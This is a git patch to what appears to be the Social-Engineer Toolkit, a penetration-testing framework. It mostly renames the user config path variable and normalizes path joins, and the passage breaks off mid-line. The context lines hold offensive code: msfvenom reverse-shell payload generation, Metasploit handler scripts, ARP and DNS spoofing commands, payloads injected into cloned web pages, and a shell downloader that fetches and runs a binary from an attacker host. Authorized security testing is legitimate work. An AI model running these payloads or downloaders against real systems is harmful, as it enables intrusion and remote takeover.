From d719ebb8b883cea5c3c337c34c0522a90c4a1849 Mon Sep 17 00:00:00 2001 From: Brigham Toskin Date: Thu, 1 Feb 2018 10:30:26 -0800 Subject: [PATCH] Normalize user config path usage with string append and os.path.join(). --- modules/ratte_module.py | 14 +- seproxy | 2 +- src/autorun/autolaunch.py | 4 +- src/core/arp_cache/arp.py | 10 +- src/core/fasttrack.py | 6 +- src/core/payloadgen/create_payloads.py | 126 +++++++++--------- src/core/payloadgen/solo.py | 8 +- src/core/payloadprep.py | 120 ++++++++--------- src/core/set.py | 84 ++++++------ src/core/setcore.py | 2 +- src/core/ssl/setssl.py | 2 +- src/fasttrack/mssql.py | 2 +- src/fasttrack/psexec.py | 2 +- src/html/spawn.py | 114 ++++++++-------- src/payloads/powershell/prep.py | 30 ++--- src/payloads/set_payloads/listener.py | 48 +++---- src/phishing/smtp/client/smtp_client.py | 76 +++++------ src/teensy/binary2teensy.py | 14 +- src/teensy/teensy.py | 4 +- src/webattack/browser_exploits/gen_payload.py | 24 ++-- src/webattack/dll_hijacking/hijacking.py | 16 +-- src/webattack/harvester/harvester.py | 60 ++++----- src/webattack/harvester/report_generator.py | 30 ++--- src/webattack/harvester/scraper.py | 22 +-- src/webattack/hta/main.py | 6 +- src/webattack/multi_attack/multiattack.py | 10 +- src/webattack/tabnabbing/tabnabbing.py | 16 +-- src/webattack/web_clone/cloner.py | 98 +++++++------- 28 files changed, 475 insertions(+), 475 deletions(-) diff --git a/modules/ratte_module.py b/modules/ratte_module.py index 9d260546b..c7e358d5a 100755 --- a/modules/ratte_module.py +++ b/modules/ratte_module.py @@ -35,7 +35,7 @@ except NameError: pass definepath = os.getcwd() -setdir = core.userconfigpath +userconfigpath = core.userconfigpath MAIN = " RATTE Java Applet Attack (Remote Administration Tool Tommy Edition) - Read the readme/RATTE_README.txt first" @@ -100,10 +100,10 @@ def java_applet_attack_tw(website, port, directory, ipaddr): ############################################ # this part is needed to rename the msf.exe file to a randomly generated one - if os.path.isfile(os.path.join(setdir, "/rand_gen")): + if os.path.isfile(os.path.join(userconfigpath, "rand_gen")): # open the file # start a loop - with open(os.path.join(setdir, "rand_gen")) as fileopen: + with open(os.path.join(userconfigpath, "rand_gen")) as fileopen: for line in fileopen: # define executable name and rename it filename = line.rstrip() @@ -111,7 +111,7 @@ def java_applet_attack_tw(website, port, directory, ipaddr): subprocess.Popen("cp src/payloads/ratte/ratte.binary %s/%s 1> /dev/null 2> /dev/null" % (directory, filename), shell=True).wait() # lastly we need to copy over the signed applet - subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (setdir, directory), shell=True).wait() + subprocess.Popen("cp %s/Signed_Update.jar %s 1> /dev/null 2> /dev/null" % (userconfigpath, directory), shell=True).wait() # TODO index.html parsen und IPADDR:Port ersetzen with open(os.path.join(directory, "index.html"), "rb") as fileopen: @@ -148,7 +148,7 @@ def prepare_ratte(ipaddr, ratteport, persistent, customexe): ############ # PATCH Server IP into RATTE ############ - with open(os.path.join(setdir, "ratteM.exe"), 'wb') as filewrite: + with open(os.path.join(userconfigpath, "ratteM.exe"), 'wb') as filewrite: host = (len(ipaddr) + 1) * "X" r_port = (len(str(ratteport)) + 1) * "Y" @@ -271,10 +271,10 @@ def main(): core.print_info("Starting java applet attack...") java_applet_attack_tw(website, javaport, "reports/", ipaddr) - with open(os.path.join(setdir, definepath, "/rand_gen")) as fileopen: + with open(os.path.join(userconfigpath, definepath, "/rand_gen")) as fileopen: for line in fileopen: ratte_random = line.rstrip() - subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(setdir, definepath), definepath, ratte_random), shell=True).wait() + subprocess.Popen("cp %s/ratteM.exe %s/reports/%s" % (os.path.join(userconfigpath, definepath), definepath, ratte_random), shell=True).wait() ####################### # start ratteserver diff --git a/seproxy b/seproxy index 0fb549bf7..bcdd85bed 100755 --- a/seproxy +++ b/seproxy @@ -45,7 +45,7 @@ if operating_system == "posix": else: proxy_string = "export http_proxy='http://{0}'".format(proxy) - with open(os.path.join(core.userconfigpath, "/proxy.config"), "w") as filewrite: + with open(os.path.join(core.userconfigpath, "proxy.config"), "w") as filewrite: filewrite.write(proxy_string) def kill_proc(port, flag): diff --git a/src/autorun/autolaunch.py b/src/autorun/autolaunch.py index 14f17f7ac..0dc5172d5 100644 --- a/src/autorun/autolaunch.py +++ b/src/autorun/autolaunch.py @@ -33,11 +33,11 @@ if os.path.isfile(os.path.join(core.userconfigpath, "fileformat.file")): os.path.join(core.userconfigpath, "template.pdf")), shell=True).wait() -if os.path.isfile(os.path.join(core.userconfigpath, "/dll/openthis.wab")): +if os.path.isfile(os.path.join(core.userconfigpath, "dll/openthis.wab")): subprocess.Popen("rm -rf {0} 1> /dev/null 2> /dev/null;" "mkdir {0} 1> /dev/null 2> /dev/null;" "cp {1} {0} 1> /dev/null 2> /dev/null".format(autorun_path, - os.path.join(core.userconfigpath, "/dll/*")), + os.path.join(core.userconfigpath, "dll/*")), shell=True).wait() trigger = 3 diff --git a/src/core/arp_cache/arp.py b/src/core/arp_cache/arp.py index b29f0a8f8..4cc4a8fd6 100755 --- a/src/core/arp_cache/arp.py +++ b/src/core/arp_cache/arp.py @@ -105,7 +105,7 @@ if ettercapchoice == 'y': # spawn a child process os.chdir(cwd) time.sleep(5) - filewrite = open(setdir + "/ettercap", "w") + filewrite = open(userconfigpath + "ettercap", "w") filewrite.write( "ettercap -T -q -i %s -P dns_spoof %s %s // //" % (interface, arp, bridge)) filewrite.close() @@ -147,8 +147,8 @@ if dsniffchoice == 'y': if dns_spoof == "": dns_spoof = "*" subprocess.Popen( - "rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (setdir), shell=True).wait() - filewrite = open(setdir + "/dnsspoof.conf", "w") + "rm %s/dnsspoof.conf 1> /dev/null 2> /dev/null" % (userconfigpath), shell=True).wait() + filewrite = open(userconfigpath + "dnsspoof.conf", "w") filewrite.write("%s %s" % (ipaddr, dns_spoof)) filewrite.close() print_error("LAUNCHING DNSSPOOF DNS_SPOOF ATTACK!") @@ -160,10 +160,10 @@ if dsniffchoice == 'y': gateway = subprocess.Popen("netstat -rn|grep %s|awk '{print $2}'| awk 'NR==2'" % ( interface), shell=True, stdout=subprocess.PIPE).communicate()[0] # open file for writing - filewrite = open(setdir + "/ettercap", "w") + filewrite = open(userconfigpath + "ettercap", "w") # write the arpspoof / dnsspoof commands to file filewrite.write( - "arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, setdir)) + "arpspoof %s | dnsspoof -f %s/dnsspoof.conf" % (gateway, userconfigpath)) # close the file filewrite.close() # change back to normal directory diff --git a/src/core/fasttrack.py b/src/core/fasttrack.py index 50e88a547..4e2c6241e 100644 --- a/src/core/fasttrack.py +++ b/src/core/fasttrack.py @@ -263,7 +263,7 @@ try: # specify we are using the fasttrack # option, this disables some features filewrite = open( - setdir + "/fasttrack.options", "w") + userconfigpath + "fasttrack.options", "w") filewrite.write("none") filewrite.close() # import fasttrack @@ -439,10 +439,10 @@ try: # if we are using the built in one if dict == "": # write out a file - filewrite = open(setdir + "/dictionary.txt", "w") + filewrite = open(userconfigpath + "dictionary.txt", "w") filewrite.write("\nPassword1\nPassword!\nlc username") # specify the path - dict = setdir + "/dictionary.txt" + dict = userconfigpath + "dictionary.txt" filewrite.close() # if we are not brute forcing diff --git a/src/core/payloadgen/create_payloads.py b/src/core/payloadgen/create_payloads.py index b57f59a3d..33de37d7d 100644 --- a/src/core/payloadgen/create_payloads.py +++ b/src/core/payloadgen/create_payloads.py @@ -53,27 +53,27 @@ attack_vector = 0 linosx = 0 multiattack = "" # grab attack vector -if os.path.isfile(setdir + "/attack_vector"): - fileopen = open(setdir + "/attack_vector", "r") +if os.path.isfile(userconfigpath + "attack_vector"): + fileopen = open(userconfigpath + "attack_vector", "r") for line in fileopen: line = line.rstrip() if line == "java": attack_vector = "java" if line == "multiattack": attack_vector = "multiattack" - multiattack = open(setdir + "/multi_payload", "w") + multiattack = open(userconfigpath + "multi_payload", "w") # here is a place holder for the multi attack java # multiattack outputs a file called multi_java if # this file is present it will allow additional # functionality multiattack_java = "off" -if os.path.isfile(setdir + "/multi_java"): +if os.path.isfile(userconfigpath + "multi_java"): multiattack_java = "on" # custom payloadgen payloadgen = "regular" -if os.path.isfile(setdir + "/payloadgen"): +if os.path.isfile(userconfigpath + "payloadgen"): payloadgen = "solo" # @@ -117,8 +117,8 @@ try: choice1 = "" # this is port choice3 = "" - if os.path.isfile(setdir + "/meterpreter_reverse_tcp_exe"): - fileopen = open(setdir + "/meterpreter_reverse_tcp_exe", "r") + if os.path.isfile(userconfigpath + "meterpreter_reverse_tcp_exe"): + fileopen = open(userconfigpath + "meterpreter_reverse_tcp_exe", "r") for line in fileopen: # this reads in the first line of the file which happens to be port # when calling through core @@ -182,7 +182,7 @@ try: encoder = 'false' payloadgen = 'solo' encode_stop = 1 - filewrite = open(setdir + "/set.payload", "w") + filewrite = open(userconfigpath + "set.payload", "w") # select setshell if choice1 == '3': filewrite.write("SETSHELL") @@ -217,11 +217,11 @@ try: # if we are using our own executable if custom == 1: - check_write = open(setdir + "/custom.exe", "w") + check_write = open(userconfigpath + "custom.exe", "w") check_write.write("VALID") check_write.close() shutil.copyfile("%s" % (choice1), "msf.exe") - shutil.copyfile("msf.exe", setdir + "/msf.exe") + shutil.copyfile("msf.exe", userconfigpath + "msf.exe") # Specify Encoding Option encoder = "false" @@ -232,12 +232,12 @@ try: if choice1 != "set/reverse_shell": # we need to rewrite index.html real quick because it has a parameter # that could get confusing - if os.path.isfile(setdir + "/web_clone/index.html"): - fileopen = open(setdir + "/web_clone/index.html", "r") + if os.path.isfile(userconfigpath + "web_clone/index.html"): + fileopen = open(userconfigpath + "web_clone/index.html", "r") data = fileopen.read() data = data.replace("freehugs", "") - os.remove(setdir + "/web_clone/index.html") - filewrite = open(setdir + "/web_clone/index.html", "w") + os.remove(userconfigpath + "web_clone/index.html") + filewrite = open(userconfigpath + "web_clone/index.html", "w") filewrite.write(data) filewrite.close() @@ -276,7 +276,7 @@ try: # if we are using the SET interactive shell then do this if choice1 == "set/reverse_shell": encoder = "false" - filewrite = open(setdir + "/set.payload.posix", "w") + filewrite = open(userconfigpath + "set.payload.posix", "w") filewrite.write("true") filewrite.close() import src.core.payloadprep @@ -330,7 +330,7 @@ try: if choice1 == "shellcode/alphanum": print_status("Generating the payload via msfvenom and generating alphanumeric shellcode...") - subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, setdir), shell=True).wait() + subprocess.Popen("%smsfvenom -p %s LHOST=%s %s StagerURILength=5 StagerVerifySSLCert=false -e EXITFUNC=thread -e x86/alpha_mixed --format raw BufferRegister=EAX > %s/meterpreter.alpha_decoded" % (meta_path(), choice9, choice2, portnum, userconfigpath), shell=True).wait() if choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyinject" or choice1 == "cmd/multi": # here we update set options to specify pyinjection and multipy @@ -339,16 +339,16 @@ try: # define, this will eventually be all of our payloads multipyinject_payload = "" # clean up old file - if os.path.isfile("%s/meta_config_multipyinjector" % (setdir)): - os.remove("%s/meta_config_multipyinjector" % (setdir)) + if os.path.isfile("%s/meta_config_multipyinjector" % (userconfigpath)): + os.remove("%s/meta_config_multipyinjector" % (userconfigpath)) # remove any old payload options - if os.path.isfile(setdir + "/payload.options.shellcode"): - os.remove(setdir + "/payload_options.shellcode") + if os.path.isfile(userconfigpath + "payload.options.shellcode"): + os.remove(userconfigpath + "payload_options.shellcode") # this is the file that gets saved with the payload and # port options - if choice1 != "cmd/multi": payload_options = open(setdir + "/payload_options.shellcode", "a") + if choice1 != "cmd/multi": payload_options = open(userconfigpath + "payload_options.shellcode", "a") while 1: # don't need any options here @@ -385,8 +385,8 @@ try: # here we prep our meta config to listen on all # the ports we want - free hugs all around - filewrite = open("%s/meta_config_multipyinjector" % (setdir), "a") - port_check = check_ports("%s/meta_config_multipyinjector" % (setdir), shellcode_port) + filewrite = open("%s/meta_config_multipyinjector" % (userconfigpath), "a") + port_check = check_ports("%s/meta_config_multipyinjector" % (userconfigpath), shellcode_port) if port_check == False: filewrite.write("use exploit/multi/handler\nset PAYLOAD %s\nset EnableStageEncoding %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (choice9, stage_encoding, ipaddr, shellcode_port)) filewrite.close() @@ -453,7 +453,7 @@ try: shellcode = encryptAES(secret, multipyinject_payload) print_status("Dynamic cipher key created and embedded into payload.") - filewrite = open("%s/meterpreter.alpha_decoded" % (setdir), "w") + filewrite = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "w") filewrite.write(shellcode) filewrite.close() @@ -462,7 +462,7 @@ try: payload_options.close() # here we are going to encode the payload via base64 - fileopen = open("%s/meterpreter.alpha_decoded" % (setdir), "r") + fileopen = open("%s/meterpreter.alpha_decoded" % (userconfigpath), "r") data = fileopen.read() if payloadgen != "solo": # base64 1 @@ -489,7 +489,7 @@ try: # last one data = base64.b64encode(b'data') # - filewrite = open("%s/meterpreter.alpha" % (setdir), "w") + filewrite = open("%s/meterpreter.alpha" % (userconfigpath), "w") filewrite.write(str(data)) filewrite.close() if choice1 == "shellcode/alphanum": @@ -510,17 +510,17 @@ try: # write out the payload if choice1 == "shellcode/alphanum" or choice1 == "shellcode/pyinject" or choice1 == "shellcode/multipyiject": - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") filewrite.write(fileopen) filewrite.close() - subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() + subprocess.Popen("cp %s/shellcodeexec.custom %s/msf.exe 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait() # we need to read in the old index.html file because its # already generated, need to present the alphanum to it - if os.path.isfile("%s/web_clone/index.html" % (setdir)): - fileopen = open("%s/web_clone/index.html" %(setdir), "r") - filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") - fileopen2 = open("%s/meterpreter.alpha" % (setdir), "r") + if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)): + fileopen = open("%s/web_clone/index.html" %(userconfigpath), "r") + filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") + fileopen2 = open("%s/meterpreter.alpha" % (userconfigpath), "r") alpha_shellcode = fileopen2.read().rstrip() data = fileopen.read() data = data.replace( @@ -539,7 +539,7 @@ try: if choice1 == "shellcode/pyinject": print_status("Prepping website for pyInjector shellcode injection..") print_status("Base64 encoding shellcode and prepping for delivery..") - subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (setdir, setdir), shell=True).wait() + subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html 1> /dev/null 2> /dev/null" % (userconfigpath, userconfigpath), shell=True).wait() if choice9 == "windows/meterpreter/reverse_tcp_allports": portnum = "LPORT=1" choice3 = "1" @@ -551,7 +551,7 @@ try: choice1 = choice9 # write out the payload for powershell injection to pick it up if used - filewrite = open(setdir + "/metasploit.payload", "w") + filewrite = open(userconfigpath + "metasploit.payload", "w") filewrite.write(choice1) filewrite.close() # import if on @@ -563,12 +563,12 @@ try: setshell_counter = 1 if setshell_counter == 0: if custom == 0: # or choice1 != "set/reverse_shell" or choice1 != "shellcode/alphanum": - if os.path.isfile("%s/web_clone/index.html" % (setdir)): + if os.path.isfile("%s/web_clone/index.html" % (userconfigpath)): if choice1 != "cmd/multi": try: core.module_reload(src.payloads.powershell.prep) except: import src.payloads.powershell.prep - if os.path.isfile("%s/x86.powershell" % (setdir)): - fileopen1 = open("%s/x86.powershell" % (setdir), "r") + if os.path.isfile("%s/x86.powershell" % (userconfigpath)): + fileopen1 = open("%s/x86.powershell" % (userconfigpath), "r") x86 = fileopen1.read() x86 = "powershell -ec " + x86 @@ -586,8 +586,8 @@ try: print_status("Embedding commands into Java Applet parameters...") print_status("Note that these will be base64-encoded once, regardless of the payload..") - fileopen3 = open("%s/web_clone/index.html" % (setdir), "r") - filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") + fileopen3 = open("%s/web_clone/index.html" % (userconfigpath), "r") + filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") data = fileopen3.read() # encode once, will need to decode later @@ -605,19 +605,19 @@ try: filewrite.write(data) filewrite.close() - subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, shell=True).wait() + subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, shell=True).wait() # here we specify the binary to deploy if we are using ones that are # required to drop binaries if custom == 1 or choice1 == "set/reverse_shell" or choice1 == "shellcode/alphanum" or choice1 == "cmd/multi": - fileopen3 = fileopen = open("%s/web_clone/index.html" % (setdir), "r") - filewrite = open("%s/web_clone/index.html.new" % (setdir), "w") + fileopen3 = fileopen = open("%s/web_clone/index.html" % (userconfigpath), "r") + filewrite = open("%s/web_clone/index.html.new" % (userconfigpath), "w") data = fileopen3.read() # check if we don't want to deploy binaries data = data.replace('param name="8" value="NO"', 'param name="8" value="YES"') filewrite.write(data) filewrite.close() - subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) + subprocess.Popen("mv %s/web_clone/index.html.new %s/web_clone/index.html" % (userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True) # specify attack vector as SET interactive shell if choice1 == "set/reverse_shell": @@ -657,7 +657,7 @@ try: if osx_path != "": # copy the payload - shutil.copyfile(osx_path, setdir + "/mac.bin") + shutil.copyfile(osx_path, userconfigpath + "mac.bin") # if linux payload if lin_path != "": @@ -672,7 +672,7 @@ try: if lin_path != "": # copy the payload - shutil.copyfile(lin_path, setdir + "/nix.bin") + shutil.copyfile(lin_path, userconfigpath + "nix.bin") else: @@ -680,9 +680,9 @@ try: osxpayload = check_config("OSX_PAYLOAD_DELIVERY=") linuxpayload = check_config("LINUX_PAYLOAD_DELIVERY=") print_status("Generating OSX payloads through Metasploit...") - subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, setdir, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() + subprocess.Popen(r"msfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/mac.bin;chmod 755 %s/mac.bin" % (meta_path(), osxpayload, choice2, port1, userconfigpath, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() print_status("Generating Linux payloads through Metasploit...") - subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() + subprocess.Popen(r"%smsfvenom -p %s LHOST=%s LPORT=%s --format elf > %s/nix.bin" % (meta_path(), linuxpayload, choice2, port2, userconfigpath), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True).wait() if multiattack_java == "on": multiattack.write("OSX=" + str(port1) + "\n") multiattack.write("OSXPAYLOAD=%s\n" % (osxpayload)) @@ -691,24 +691,24 @@ try: osxcheck = check_options("MAC.BIN=") linuxcheck = check_options("NIX.BIN=") - shutil.copyfile(setdir + "/mac.bin", setdir + "/web_clone/%s" % (osxcheck)) - shutil.copyfile(setdir + "/nix.bin", setdir + "/web_clone/%s" % (linuxcheck)) + shutil.copyfile(userconfigpath + "mac.bin", userconfigpath + "web_clone/%s" % (osxcheck)) + shutil.copyfile(userconfigpath + "nix.bin", userconfigpath + "web_clone/%s" % (linuxcheck)) # try block here try: # if they want a listener, start here - if os.path.isfile("%s/meta_config" % (setdir)): + if os.path.isfile("%s/meta_config" % (userconfigpath)): # if its already created - filewrite = open("%s/meta_config" % (setdir), "a") + filewrite = open("%s/meta_config" % (userconfigpath), "a") - if not os.path.isfile("%s/meta_config" % (setdir)): + if not os.path.isfile("%s/meta_config" % (userconfigpath)): # if we need to create it - filewrite = open("%s/meta_config" % (setdir), "w") + filewrite = open("%s/meta_config" % (userconfigpath), "w") # if there isn't a multiattack metasploit, setup handler - if not os.path.isfile("%s/multi_meta" % (setdir)): + if not os.path.isfile("%s/multi_meta" % (userconfigpath)): - port_check = check_ports("%s/meta_config" % (setdir), choice3) + port_check = check_ports("%s/meta_config" % (userconfigpath), choice3) if port_check == False: filewrite.write("use exploit/multi/handler\n") filewrite.write("set PAYLOAD " + choice1 + "\n") @@ -726,10 +726,10 @@ try: # config option for using multiscript meterpreter if meterpreter_multi == "ON": - multiwrite = open(setdir + "/multi_meter.file", "w") + multiwrite = open(userconfigpath + "multi_meter.file", "w") multiwrite.write(meterpreter_multi_command) filewrite.write( - "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (setdir)) + "set InitialAutorunScript multiscript -rc %s/multi_meter.file\n" % (userconfigpath)) multiwrite.close() filewrite.write("exploit -j\r\n\r\n") @@ -759,10 +759,10 @@ try: filewrite.write("set LPORT " + port2 + "\n") if linux_meterpreter_multi == "ON": multiwrite = open( - setdir + "/lin_multi_meter.file", "w") + userconfigpath + "lin_multi_meter.file", "w") multiwrite.write(linux_meterpreter_multi_command) filewrite.write( - "set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (setdir)) + "set InitialAutorunScript multiscript -rc %s/lin_multi_meter.file\n" % (userconfigpath)) multiwrite.close() filewrite.write("set ExitOnSession false\n") filewrite.write("exploit -j\r\n\r\n") @@ -781,11 +781,11 @@ except KeyboardInterrupt: # finish closing up the remenant files if attack_vector == "multiattack": multiattack.close() -if os.path.isfile("%s/fileformat.file" % (setdir)): - filewrite = open("%s/payload.options" % (setdir), "w") +if os.path.isfile("%s/fileformat.file" % (userconfigpath)): + filewrite = open("%s/payload.options" % (userconfigpath), "w") filewrite.write(choice1 + " " + ipaddr + " " + choice3) filewrite.close() if choice1 == "set/reverse_shell": - if os.path.isfile(setdir + "/meta_config"): - os.remove(setdir + "/meta_config") + if os.path.isfile(userconfigpath + "meta_config"): + os.remove(userconfigpath + "meta_config") diff --git a/src/core/payloadgen/solo.py b/src/core/payloadgen/solo.py index 9076ef582..b042ab600 100644 --- a/src/core/payloadgen/solo.py +++ b/src/core/payloadgen/solo.py @@ -16,14 +16,14 @@ meta_path = meta_path() def payload_generate(payload, lhost, port): # generate metasploit subprocess.Popen(meta_path + "msfvenom -p %s LHOST=%s LPORT=%s --format=exe > %s/payload.exe" % - (payload, lhost, port, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait() + (payload, lhost, port, userconfigpath), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait() # write out the rc file - filewrite = open(setdir + "/meta_config", "w") + filewrite = open(userconfigpath + "meta_config", "w") filewrite.write( "use multi/handler\nset payload %s\nset LHOST %s\nset LPORT %s\nset ExitOnSession false\nexploit -j\r\n\r\n" % (payload, lhost, port)) filewrite.close() print_status( - "Payload has been exported to the default SET directory located under: " + setdir + "/payload.exe") + "Payload has been exported to the default SET directory located under: " + userconfigpath + "payload.exe") show_payload_menu2 = create_menu(payload_menu_2_text, payload_menu_2) payload = (raw_input(setprompt(["4"], ""))) @@ -49,4 +49,4 @@ if check_options("INFECTION_MEDIA=") != "ON": print_status( "Launching msfconsole, this could take a few to load. Be patient...") subprocess.Popen(meta_path + "msfconsole -r " + - setdir + "/meta_config", shell=True).wait() + userconfigpath + "meta_config", shell=True).wait() diff --git a/src/core/payloadprep.py b/src/core/payloadprep.py index 840166753..155aae323 100644 --- a/src/core/payloadprep.py +++ b/src/core/payloadprep.py @@ -43,12 +43,12 @@ for line in fileopen: "\n [-] SET Interactive Mode is set to DISABLED. Please change it in the SET config") # make directory if it's not there -if not os.path.isdir(setdir + "/web_clone/"): - os.makedirs(setdir + "/web_clone/") +if not os.path.isdir(userconfigpath + "web_clone/"): + os.makedirs(userconfigpath + "web_clone/") # grab ip address and SET web server interface -if os.path.isfile(setdir + "/interface"): - fileopen = open(setdir + "interface", "r") +if os.path.isfile(userconfigpath + "interface"): + fileopen = open(userconfigpath + "interface", "r") for line in fileopen: ipaddr = line.rstrip() @@ -94,8 +94,8 @@ webserver = exe_name + " " + webserver # this is generated through payloadgen.py and lets SET know if its a RATTE # payload or SET payload -if os.path.isfile(setdir + "/set.payload"): - fileopen = open(setdir + "/set.payload", "r") +if os.path.isfile(userconfigpath + "set.payload"): + fileopen = open(userconfigpath + "set.payload", "r") for line in fileopen: payload_selection = line.rstrip() else: @@ -105,7 +105,7 @@ else: # determine if we want to target osx/nix as well posix = False # find if we selected it -if os.path.isfile(setdir + "/set.payload.posix"): +if os.path.isfile(userconfigpath + "set.payload.posix"): # if we have then claim true posix = True @@ -114,20 +114,20 @@ if payload_selection == "SETSHELL": # replace ipaddress with one that we need for reverse connection back fileopen = open("src/payloads/set_payloads/downloader.windows", "rb") data = fileopen.read() - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") host = int(len(exe_name) + 1) * "X" webserver_count = int(len(webserver) + 1) * "S" ipaddr_count = int(len(ipaddr) + 1) * "M" filewrite.write(data.replace(str(host), exe_name + "\x00", 1)) filewrite.close() - fileopen = open(setdir + "/msf.exe", "rb") + fileopen = open(userconfigpath + "msf.exe", "rb") data = fileopen.read() - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") filewrite.write(data.replace(str(webserver_count), webserver + "\x00", 1)) filewrite.close() - fileopen = open(setdir + "/msf.exe", "rb") + fileopen = open(userconfigpath + "msf.exe", "rb") data = fileopen.read() - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") filewrite.write(data.replace(str(ipaddr_count), ipaddr + "\x00", 1)) filewrite.close() @@ -135,14 +135,14 @@ if payload_selection == "SETSHELL": if payload_selection == "RATTE": fileopen = open("src/payloads/ratte/ratte.binary", "rb") data = fileopen.read() - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") host = int(len(ipaddr) + 1) * "X" rPort = int(len(str(port)) + 1) * "Y" filewrite.write(data.replace(str(host), ipaddr + "\x00", 1)) filewrite.close() - fileopen = open(setdir + "/msf.exe", "rb") + fileopen = open(userconfigpath + "msf.exe", "rb") data = fileopen.read() - filewrite = open(setdir + "/msf.exe", "wb") + filewrite = open(userconfigpath + "msf.exe", "wb") filewrite.write(data.replace(str(rPort), str(port) + "\x00", 1)) filewrite.close() @@ -152,22 +152,22 @@ if upx_encode == "ON" or upx_encode == "on": # core upx pass -if os.path.isfile(setdir + "/web_clone/msf.exe"): - os.remove(setdir + "/web_clone/msf.exe") -if os.path.isfile(setdir + "/msf.exe"): - shutil.copyfile(setdir + "/msf.exe", setdir + "/web_clone/msf.exe") +if os.path.isfile(userconfigpath + "web_clone/msf.exe"): + os.remove(userconfigpath + "web_clone/msf.exe") +if os.path.isfile(userconfigpath + "msf.exe"): + shutil.copyfile(userconfigpath + "msf.exe", userconfigpath + "web_clone/msf.exe") if payload_selection == "SETSHELL": - if os.path.isfile(setdir + "/web_clone/x"): - os.remove(setdir + "/web_clone/x") + if os.path.isfile(userconfigpath + "web_clone/x"): + os.remove(userconfigpath + "web_clone/x") shutil.copyfile("%s/src/payloads/set_payloads/shell.windows" % - (definepath), setdir + "/web_clone/x") + (definepath), userconfigpath + "web_clone/x") # if we are targetting nix if posix == True: print_info( "Targetting of OSX/Linux (POSIX-based) as well. Prepping posix payload...") - filewrite = open(setdir + "/web_clone/mac.bin", "w") + filewrite = open(userconfigpath + "web_clone/mac.bin", "w") payload_flags = webserver.split(" ") # grab osx binary name osx_name = generate_random_string(10, 10) @@ -255,21 +255,21 @@ if posix == True: linux_name = generate_random_string(10, 10) downloader = "#!/usr/bin/sh\ncurl -C - -O http://%s/%s\nchmod +x %s\n./%s %s %s &" % ( payload_flags[1], linux_name, linux_name, linux_name, payload_flags[1], payload_flags[2]) - filewrite = open(setdir + "/web_clone/nix.bin", "w") + filewrite = open(userconfigpath + "web_clone/nix.bin", "w") filewrite.write(downloader) filewrite.close() shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.osx", - setdir + "/web_clone/%s" % (osx_name)) + userconfigpath + "web_clone/%s" % (osx_name)) shutil.copyfile(definepath + "/src/payloads/set_payloads/shell.linux", - setdir + "/web_clone/%s" % (linux_name)) + userconfigpath + "web_clone/%s" % (linux_name)) # copy over the downloader scripts osx_down = check_options("MAC.BIN=") lin_down = check_options("NIX.BIN=") - shutil.copyfile(setdir + "/web_clone/nix.bin", - setdir + "/web_clone/%s" % (lin_down)) - shutil.copyfile(setdir + "/web_clone/mac.bin", - setdir + "/web_clone/%s" % (osx_down)) + shutil.copyfile(userconfigpath + "web_clone/nix.bin", + userconfigpath + "web_clone/%s" % (lin_down)) + shutil.copyfile(userconfigpath + "web_clone/mac.bin", + userconfigpath + "web_clone/%s" % (osx_down)) # check to see if we are using a staged approach or direct shell stager = check_config("SET_SHELL_STAGER=").lower() @@ -277,11 +277,11 @@ if stager == "off" or payload_selection == "SETSHELL_HTTP": # only trigger if we are using the SETSHELL if payload_selection == "SETSHELL" or payload_selection == "SETSHELL_HTTP": # ensure that index.html is really there - if 